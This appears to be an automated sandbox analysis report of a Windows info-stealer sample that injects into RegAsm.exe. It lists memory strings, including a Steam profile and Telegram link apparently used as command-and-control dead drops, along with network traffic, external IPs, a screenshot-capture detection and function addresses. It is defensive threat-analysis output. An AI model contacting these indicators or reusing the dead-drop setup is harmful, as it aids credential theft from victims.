Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://mozilla.org0/
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/g
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199658817715
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/badges
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715/inventory/
Source: RegAsm.exe, 00000003.00000002.1976459689.00000000015FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715c
Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199658817715https://t.me/sa9okCristina
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://support.mozilla.org
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: EGIDAAFI.3.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGIDAAFI.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: EGIDAAFI.3.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, 00000000.00000002.1702569185.0000000003EC5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/sa9ok
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ECFHIJKJ.3.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: IIJDBGDGCGDAKFIDGIDBFIEHDH.3.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: RegAsm.exe, 00000003.00000002.1976459689.0000000001646000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199658817715[1].htm.3.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.112.44.153:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49732 version: TLS 1.2

Contains functionality to record screenshots

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_00411BD0

System Summary

.NET source code contains very large array initializations

Source: file.exe, RemoteObjects.cs

Large array initialization: RemoteObjects: array initializer size 208384

Contains functionality to call native functions

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	3_2_6C6FED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73B8C0 rand_s,NtQueryVirtualMemory,	3_2_6C73B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	3_2_6C73B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C73B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	3_2_6C6DF280

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_02D30EEF	0_2_02D30EEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041F0F0	3_2_0041F0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CA69	3_2_0041CA69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DBE7	3_2_0041DBE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041CFBA	3_2_0041CFBA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6D35A0	3_2_6C6D35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C715C10	3_2_6C715C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74AC00	3_2_6C74AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C716CF0	3_2_6C716CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E6C80	3_2_6C6E6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EFD00	3_2_6C6EFD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FED10	3_2_6C6FED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C710DD0	3_2_6C710DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C746E63	3_2_6C746E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C713E50	3_2_6C713E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C722E4E	3_2_6C722E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F9E50	3_2_6C6F9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C739E30	3_2_6C739E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C717E10	3_2_6C717E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DBEF0	3_2_6C6DBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EFEF0	3_2_6C6EFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C734EA0	3_2_6C734EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F5E90	3_2_6C6F5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E9F00	3_2_6C6E9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C706FF0	3_2_6C706FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DDFE0	3_2_6C6DDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F8850	3_2_6C6F8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FD850	3_2_6C6FD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C71B820	3_2_6C71B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C724820	3_2_6C724820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E7810	3_2_6C6E7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7158E0	3_2_6C7158E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C72B970	3_2_6C72B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6ED960	3_2_6C6ED960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FA940	3_2_6C6FA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C70D9B0	3_2_6C70D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DC9A0	3_2_6C6DC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C732990	3_2_6C732990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C719A60	3_2_6C719A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F1AF0	3_2_6C6F1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C718AC0	3_2_6C718AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C742AB0	3_2_6C742AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C704AA0	3_2_6C704AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6ECAB0	3_2_6C6ECAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74BA90	3_2_6C74BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E5477	3_2_6C6E5477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74545C	3_2_6C74545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74542B	3_2_6C74542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DD4E0	3_2_6C6DD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6E64C0	3_2_6C6E64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FD4D0	3_2_6C6FD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7334A0	3_2_6C7334A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73C4A0	3_2_6C73C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C700512	3_2_6C700512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7385F0	3_2_6C7385F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DC670	3_2_6C6DC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6F4640	3_2_6C6F4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C725600	3_2_6C725600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7476E3	3_2_6C7476E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C73E680	3_2_6C73E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C717710	3_2_6C717710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7277A0	3_2_6C7277A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C71F070	3_2_6C71F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6FC0E0	3_2_6C6FC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7450C7	3_2_6C7450C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7060A0	3_2_6C7060A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C74B170	3_2_6C74B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C715190	3_2_6C715190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C71E2F0	3_2_6C71E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6D22A0	3_2_6C6D22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6EC370	3_2_6C6EC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6D5340	3_2_6C6D5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7453C8	3_2_6C7453C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C6DF380	3_2_6C6DF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FAC60	3_2_6C7FAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C84ECD0	3_2_6C84ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8B6C00	3_2_6C8B6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8CAC30	3_2_6C8CAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7EECC0	3_2_6C7EECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C886D90	3_2_6C886D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C97CDC0	3_2_6C97CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C978D20	3_2_6C978D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C91AD50	3_2_6C91AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F4DB0	3_2_6C7F4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8BED70	3_2_6C8BED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C876E90	3_2_6C876E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C890EC0	3_2_6C890EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8D0E20	3_2_6C8D0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FAEC0	3_2_6C7FAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C88EE70	3_2_6C88EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C938FB0	3_2_6C938FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F6F10	3_2_6C7F6F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8CEFF0	3_2_6C8CEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7F0FE0	3_2_6C7F0FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C930F20	3_2_6C930F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C85EF40	3_2_6C85EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C7FEFB0	3_2_6C7FEFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8B2F70	3_2_6C8B2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8DC8C0	3_2_6C8DC8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C8F68E0	3_2_6C8F68E0
